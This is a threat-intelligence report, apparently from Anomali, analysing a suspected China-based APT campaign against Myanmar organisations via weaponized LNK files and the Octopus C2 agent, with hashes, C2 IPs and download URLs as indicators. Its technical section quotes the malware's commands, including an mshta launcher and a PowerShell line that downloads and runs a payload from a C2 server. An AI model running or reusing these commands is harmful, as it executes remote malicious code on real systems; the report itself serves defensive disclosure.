Unknown China-Based APT Targeting Myanmarese Entities

<p><em>Authored by: Parthiban Rajendran and Gage Mele<br/> Information cutoff date: 6/19/2020</em></p> <h2>Overview</h2> <p>Anomali Threat Research has identified malicious activity targeting entities based in Myanmar (Burma) that appears to have begun in March 2020; this is based on file names and payload compilation times. An unidentified Advanced Persistent Threat (APT), very likely China-based, is distributing Windows Shortcut (LNK) files that are being renamed and distributed to multiple targets, likely via spearphishing. Anomali Threat Research found these LNK files located inside multiple, uniquely-named RAR, TGZ, and ZIP files. The RAR and ZIP files are hosted on Google Drive, this is very likely a tactic to avoid antivirus detection. The group uses the PowerShell-based, Red Teaming tool <strong>Octopus</strong> for Command and Control (C2) communication.</p> <p>In addition, Anomali Threat Research found that the LNK file closely resembles the one used by the China-based APT, <a href="https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations">Mustang Panda</a>. Anomali Threat Research does not believe that this group is responsible for this activity. This similarity may potentially indicate a sharing of tools, which is common amongst some state-sponsored groups, or perhaps a similar tool that is used to target specific geographic regions. At the time of this writing, Anomali Threat Research cannot attribute this APT activity to any specific group. The renamed LNK files are shown in Table 1 below.</p> <h2>Targeting</h2> <p>China-sponsored APT groups are known to target countries in which the government of the People’s Republic of China is investing in, as part of its Belt and Road Initiative. This has also been observed by Anomali Threat Research analysis of the China-based APT, Mustang Panda. China and Myanmar (Burma) have had multiple instances of economic activity and agreements in 2020, as of this writing, and the two countries share a complex history that often resulted in conflict.^[1] In January 2020, President Xi Jinping visited Myanmar and State Counselor Aung San Suu signed 33 agreements concerning projects as part of the Belt and Road Initiative.^[2] China is also one of the largest investors in Myanmar, accounting for a quarter of all Myanmar’s investment, and is Myanmar’s largest export partner.^[3] Anomali Threat Research believes that because of these economic factors, in addition, to file names and compilation times, similar malicious functionality to previously-attributed China-based groups and geographic location of potential targets, that this activity very likely originates from a China-based source.</p> <h3>Potentially-Targeted Entities</h3> <p>These possible targets are based specifically on file names identified by Anomali Threat Research.</p> <ul> <li>Myanmar Police Force (MPF)</li> <li>National Crisis Management Center (NCMC)</li> <li>National League for Democracy (NLD)</li> <li>Office of Chief of Military Security Affairs (OCMSA)</li> </ul> <p>The economic activity between China and Myanmar that is of particular interest to Anomali Threat Research is the Myanmar Yatai International Holding Group’s, a subsidiary of China’s Yatai Group, investment into the development of 25.5 acres in Kayin State, Myanmar.^[4] There are dubious details concerning the urban development in the acreage near the Thailand border, which was approved by the Myanmar Investment Commission, and discussed by a director of Myanmar’s Directorate of Investment Company Administration (DICA); who confirmed the land was for 59 villas in three years.^[5] In early-March 2020, the Myanmar Yatai International Holding Group claimed that the first phase of development covered 214 acres, instead of the 25.5 acres approved by the government in an area controlled by Kayin State.^[6] The claim in March 2020 may be a potential catalyst, or purposefully alignment, for this campaign.</p> <p style="text-align: center;"><em>Table 1 - Renamed LNKs Located inside RAR or ZIP</em></p> <table class="table table-striped table-bordered" style="table-layout: fixed;"> <thead> <tr> <th scope="col">File Name</th> <th scope="col">MD5</th> </tr> </thead> <tbody> <tr> <td style="word-wrap: break-word;">ocmsa[2020]report.rar</td> <td style="word-wrap: break-word;">916b26f22658ce252531bb4ea43ef4cf</td> </tr> <tr> <td style="word-wrap: break-word;">Htoo 2 army research (Mpf 29-03-2020).zip</td> <td style="word-wrap: break-word;">75b72340d6988ac262cabf923e548952</td> </tr> <tr> <td style="word-wrap: break-word;">ocmsa Htoo 2 army research (Mpf 29-03-2020).rar</td> <td style="word-wrap: break-word;">1f89a9d077a9712e6d227ef3cb1faac9</td> </tr> <tr> <td style="word-wrap: break-word;">ocmsa[30-03-2020].zip</td> <td style="word-wrap: break-word;">9e1f7e35fb3ae292f478d346d076c274</td> </tr> </tbody> </table> <h2>Technical Analysis</h2> <p>Threat actors very likely distributing spearphishing emails with links to download an attachment from Google Drive. Utilizing Google Drive is a known tactic used by actors to evade antivirus and security scanners from identifying the malicious files. Once a user navigates to the Drive URL that a ZIP or RAR file that contains a weaponized Windows Shortcut file will be downloaded on the target host. The LNK file utilized in the campaign contains an embedded HTA file with VBscript that, once executed, will drop and run an executable in the background and communicates with the Command and Control (C2).</p> <h3>LNK File Analysis</h3> <p>Once the user opens the LNK file, the below command gets executed. The command looks for a file that contains <strong>*2020*.LNK</strong> and proceeds to execute via mshta.exe.</p> <h4>LNK metadata</h4> <p>Machine ID: win-luu9i5otui2<br/> MAC Address: 00:0c:29:5a:a6:25<br/> MAC Vendor: VMWARE<br/> Creation: 2019-08-05 01:31:57</p> <h3>Command</h3> <pre> /c for %x in (%temp%=%cd%) do for /f "delims==" %i in ('dir /s /b "%x *2020*.LNK"') do start %TEMP:~-2,1%shta "%i"</pre> <p>After the command execution, it writes an executable named <strong>f.exe</strong> in the “C:userspublic.exe” directory. The file <strong>f.exe</strong> is then executed using Windows Management Instrumentation (WMI) in a hidden window via WMI Tasks.</p> <p style="text-align: center;"><em><img alt="Screenshot of the LNK file" src="https://cdn.filestackcontent.com/I3tZsMJsRIOCwGQYTWGp" style="width: 400px;"/><br/> Figure 2 - Screenshot of the LNK file</em></p> <p>It is worth noting that the LNK file with an embedded HTA file is very similar to Mustang Panda’s initial dropper, however, Anomali Threat Research could not attribute this activity to the group.</p> <p>The executable <strong>f.exe</strong> uses the Living off the Land (LOLbin) technique to launch <strong>cmd.exe</strong> via the <strong>ShellExec_RunDLL</strong> function. The below command uses Powershell to download and execute the second stage payload from the C2 server.</p> <pre> "C:WindowsSystem32 undll32.exe" SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c powershell IEX (New-Object Net.WebClient).DownloadString('http://193.29.59.130/index');"</pre> <p>The downloaded file <strong>index</strong> is a PowerShell script that was found to be a publicly available <strong>Octopus C2</strong> framework agent as shown in Figure 3.^[7]</p> <p style="text-align: center;"><em><img alt="Octopus C2 agent" src="https://cdn.filestackcontent.com/lyPmRIOSo289RyBtHavw"/><br/> Figure 3 - Octopus C2 agent comparison</em></p> <p>The Octopus agent fingerprints the host and sends the collected information back to C2 as part of the encrypted HTTP header as shown in Figure 4. The Octopus agent can be used to download further payloads or perform additional activity onto the infected host.</p> <p style="text-align: center;"><em><img alt="Octopus agent code" src="https://cdn.filestackcontent.com/1Acw0qaYSXSsyqSC3rrB"/><br/> Figure 4 - Snippet of the Octopus agent code</em></p> <h3>Network Pivoting for Additional Samples</h3> <p><strong>193.29.59[.]130</strong></p> <p>Using the IP address 193.29.59[.]130 as a pivot point Anomali Threat Research was able to find a new sample named <strong>D0CX_OCMSA Russia Army Weppon Ferrence to Thailand Archive.exe</strong> from Hybrid-analysis.com as shown in Figure 5.</p> <p style="text-align: center;"><em><img alt="Newly Identified Sample" src="https://cdn.filestackcontent.com/6xGzErmWTHKxyYliCxHL"/><br/> Figure 5 - Screenshot of Newly Identified Sample</em></p> <p>The sample communicates to two C2 IP addresses as shown in Figure 6.</p> <ul> <li>23.106.122.234</li> <li>193.29.59.130</li> </ul> <p style="text-align: center;"><em><img alt="Newly Observed C2 IP Address" src="https://cdn.filestackcontent.com/we7vbeMRQ0qNhhiZOelh"/><br/> Figure 6 - Newly Observed C2 IP Address</em></p> <p><strong>23.106.122.234</strong></p> <p>Upon pivoting using the IP address <strong>23.106.122.234</strong>, Anomali Threat Research was able to identify the PowerShell-based Octopus agent from the C2 server as shown in Figure 7 below.</p> <p style="text-align: center;"><em><img alt="Newly Identified Samples Communicating to 23.106.122.234" src="https://cdn.filestackcontent.com/IN4XLKwfQgeHyAhr4mmE"/><br/> Figure 7 - Newly Identified Samples Communicating to 23.106.122.234</em></p> <h3>Pivoting via Compilation Timestamp</h3> <p>In order to find more samples from the campaign, Anomali Threat Research used the compilation timestamp from one of the identified samples 6a1611c1bd34fa3878617ef2905b1d87 which was compiled on</p> <p><strong>2020-03-10 07:54:26</strong> and shown in Table 2 below.</p> <p style="text-align: center;"><em>Table 2 -</em></p> <table class="table table-striped table-bordered" style="table-layout: fixed;"> <thead> <tr> <th scope="col">File Name</th> <th scope="col">MD5</th> <th scope="col">Compilation Timestamp</th> </tr> </thead> <tbody> <tr> <td style="word-wrap: break-word;">No file name observed</td> <td style="word-wrap: break-word;">4cf56653f28ccd03a78213f0b4cb0075</td> <td style="word-wrap: break-word;">2020-03-10 07:54:26</td> </tr> <tr> <td style="word-wrap: break-word;">List Of Maf President Commander in Chief with NLD Election.Exe</td> <td style="word-wrap: break-word;">fd82b2a1b6479de8e1949c72401c1328</td> <td style="word-wrap: break-word;">2020-03-10 07:54:26</td> </tr> <tr> <td style="word-wrap: break-word;">order545.exe</td> <td style="word-wrap: break-word;">a086fae1cd2a1074ee489535169f1b79</td> <td style="word-wrap: break-word;">2020-03-10 07:54:26</td> </tr> </tbody> </table> <h2>Conclusion</h2> <p>The malicious activity identified by Anomali Threat Research appears to align with techniques that would be used by a China-based group. Following the Belt and Road Initiative can often result in identifying malicious activity that coincides with China-based groups’ Tactics, Techniques, and Procedures (TTPs). The specificity in file names associated with Myanmarese entities, similar LNK functionality to known China-sponsored APTs, as well as economic and geographical factors, lead Anomali Threat Research to believe that China-based APT is responsible for this campaign.</p> <h2>IOCs</h2> <table class="table table-striped table-bordered" style="table-layout: fixed;"> <tbody> <tr> <td style="word-wrap: break-word;">File Name</td> <td style="word-wrap: break-word;">Hash</td> </tr> <tr> <td style="word-wrap: break-word;">ocmsa[2020]report.rar</td> <td style="word-wrap: break-word;">916b26f22658ce252531bb4ea43ef4cf</td> </tr> <tr> <td style="word-wrap: break-word;">ocmsa[30-03-2020].zip</td> <td style="word-wrap: break-word;">9e1f7e35fb3ae292f478d346d076c274</td> </tr> <tr> <td style="word-wrap: break-word;">ocmsa Htoo 2 army research (Mpf 29-03-2020).rar</td> <td style="word-wrap: break-word;">1f89a9d077a9712e6d227ef3cb1faac9</td> </tr> <tr> <td style="word-wrap: break-word;">Htoo 2 army research (Mpf 29-03-2020).zip</td> <td style="word-wrap: break-word;">75b72340d6988ac262cabf923e548952</td> </tr> <tr> <td style="word-wrap: break-word;">MSAU UPR Facts.Tgz</td> <td style="word-wrap: break-word;">c94135f94ced83e1bb4c4ebf16d66b30</td> </tr> <tr> <td style="word-wrap: break-word;">ocmsa(30-03-2020).lnk</td> <td style="word-wrap: break-word;">721a7ddd34d801a883bfc8a1e6349a21</td> </tr> <tr> <td style="word-wrap: break-word;">Htoo 2 army research (Mpf 29-03-2020).lnk.lnk</td> <td style="word-wrap: break-word;">721a7ddd34d801a883bfc8a1e6349a21</td> </tr> <tr> <td style="word-wrap: break-word;">f.exe</td> <td style="word-wrap: break-word;">4754dfaf0a10710c061767acc3adf0e3</td> </tr> <tr> <td style="word-wrap: break-word;">order545.exe</td> <td style="word-wrap: break-word;">a086fae1cd2a1074ee489535169f1b79</td> </tr> <tr> <td style="word-wrap: break-word;">D0CX_OCMSA Russia Army Weppon Ferrence to Thailand Archive.exe</td> <td style="word-wrap: break-word;">f8760362de259d8ce4c31c2e9ce1e1392e5eae8262224a517d3accc0ccb9f8d8</td> </tr> <tr> <td style="word-wrap: break-word;">List Of Maf President Commander in Chief with NLD Election.Exe</td> <td style="word-wrap: break-word;">fd82b2a1b6479de8e1949c72401c1328</td> </tr> <tr> <td style="word-wrap: break-word;">Script.php</td> <td style="word-wrap: break-word;">1a3683b051356a0d4fef2f8a33cd088c</td> </tr> <tr> <td style="word-wrap: break-word;">23.106.122.234</td> <td style="word-wrap: break-word;">C2</td> </tr> <tr> <td style="word-wrap: break-word;">193.29.59.130</td> <td style="word-wrap: break-word;">C2</td> </tr> </tbody> </table> <p>The RAR and ZIP files are downloaded from google drive.</p> <table class="table table-striped table-bordered" style="table-layout: fixed;"> <thead> <tr> <th scope="col">File Name</th> <th scope="col">Download URL</th> </tr> </thead> <tbody> <tr> <td style="word-wrap: break-word;">ocmsa[2020]report.rar</td> <td style="word-wrap: break-word;">https://drive.google.com/u/0/uc?id=1WWpgJMZce_yeQd2q5i1z1vUu7_d1rulX&amp;export=download</td> </tr> <tr> <td style="word-wrap: break-word;">ocmsa Htoo 2 army research (Mpf 29-03-2020).rar</td> <td style="word-wrap: break-word;">https://drive.google.com/u/0/uc?id=1WWpgJMZce_yeQd2q5i1z1vUu7_d1rulX&amp;export=download</td> </tr> </tbody> </table> <h2>Endnotes</h2> <p>^[1] Thu Thu Aung and Poppy McPherson, “Myanmar, China ink deals to accelerate Belt and Road as Xi courts and isolated Suu Kyi,” Reuters, accessed June 18, 2020, published January 18, 2020, https://www.reuters.com/article/us-myanmar-china/myanmar-china-ink-deals-to-accelerate-belt-and-road-as-xi-courts-an-isolated-suu-kyi-idUSKBN1ZH054; Marvin C. Ott, “Myanmar in China’s Embrace,” Foreign Policy Institute: Asia Program, accessed June 18, 2020, published January 24, 2020, https://www.fpri.org/article/2020/01/myanmar-in-chinas-embrace/; Laura Zhou, “China sees Myanmar as stepping stone to Indian Ocean, energy security,” South China Morning Post, accessed June 18, 2020, published January 15, 2020, https://www.scmp.com/news/china/diplomacy/article/3046218/china-sees-myanmar-stepping-stone-indian-ocean-energy-security; Sai Wanna, “Myanmar military accused ethnic Karen armed group of violating truce,” Myanmar Times, accessed June 18, 2020, published May 21, 2020, https://www.mmtimes.com/news/myanmar-military-accuses-ethnic-karen-armed-group-violating-truce.html.</p> <p>^[2] Thu Thu Aung and Poppy McPherson, “Myanmar, China ink deals to accelerate Belt and Road as Xi courts and isolated Suu Kyi,” Reuters.</p> <p>^[3] Bloomberg, “Myanmar warns sanctions over Rohingya genocide will push it closer to China and dismisses ‘debt trap’ concerns,” South China Morning Post, accessed June 18, 2020, published January 27, 2020, https://www.scmp.com/news/asia/southeast-asia/article/3047736/myanmar-warns-world-sanctions-over-rohingya-genocide-will; Central Intelligence Agency, “EAST ASIA/SOUTHEAST ASIA :: BURMA,” The World Factbook, accessed June 19, 2020, https://www.cia.gov/library/publications/the-world-factbook/geos/bm.html.</p> <p>^[4] Nan Lwin, “Myanmar Govt to Probe Contentious Chinese Development on Thai Border,” The Irrawaddy, accessed June 18, 2020, published June 16, 2020, https://www.irrawaddy.com/news/burma/myanmar-govt-probe-contentious-chinese-development-thai-border.html.</p> <p>^[5] “INSPECTION OF MYANMAR YATAI INTERNATIONAL HOLDING CO., LTD. AND APEX RUBBER CO., LTD,” Director of Investment and Company Administration, accessed June 18, 2020, published June 26, 2019; Nyien Nyien, “Chinese Developer’s Grand Claims Spark Fresh Concern in Karen State,” The Irrawaddy, accessed June 18, 2020, published March 6, 2019, https://www.irrawaddy.com/news/burma/chinese-developers-grand-claims-spark-fresh-concern-karen-state.html.</p> <p>^[6] Nyien Nyien, “Chinese Developer’s Grand Claims Spark Fresh Concern in Karen State,” The Irrawaddy.</p> <p>^[7] Octopus, accessed June 19, 2020, https://github.com/mhaskar/Octopus/blob/master/agents/agent.ps1.oct.</p> <p> </p> <h3>Sign up for the <a href="https://www.anomali.com/learn/wtb-ff" target="_blank">Anomali Weekly Threat Briefing</a>!</h3> <p>The Anomali Threat Research Team publishes the <a href="https://www.anomali.com/learn/wtb-ff" target="_blank">Weekly Threat Briefing (WTB)</a> so you can stay aware of the latest threats—get a summary of key cybersecurity threat intelligence of the week.</p>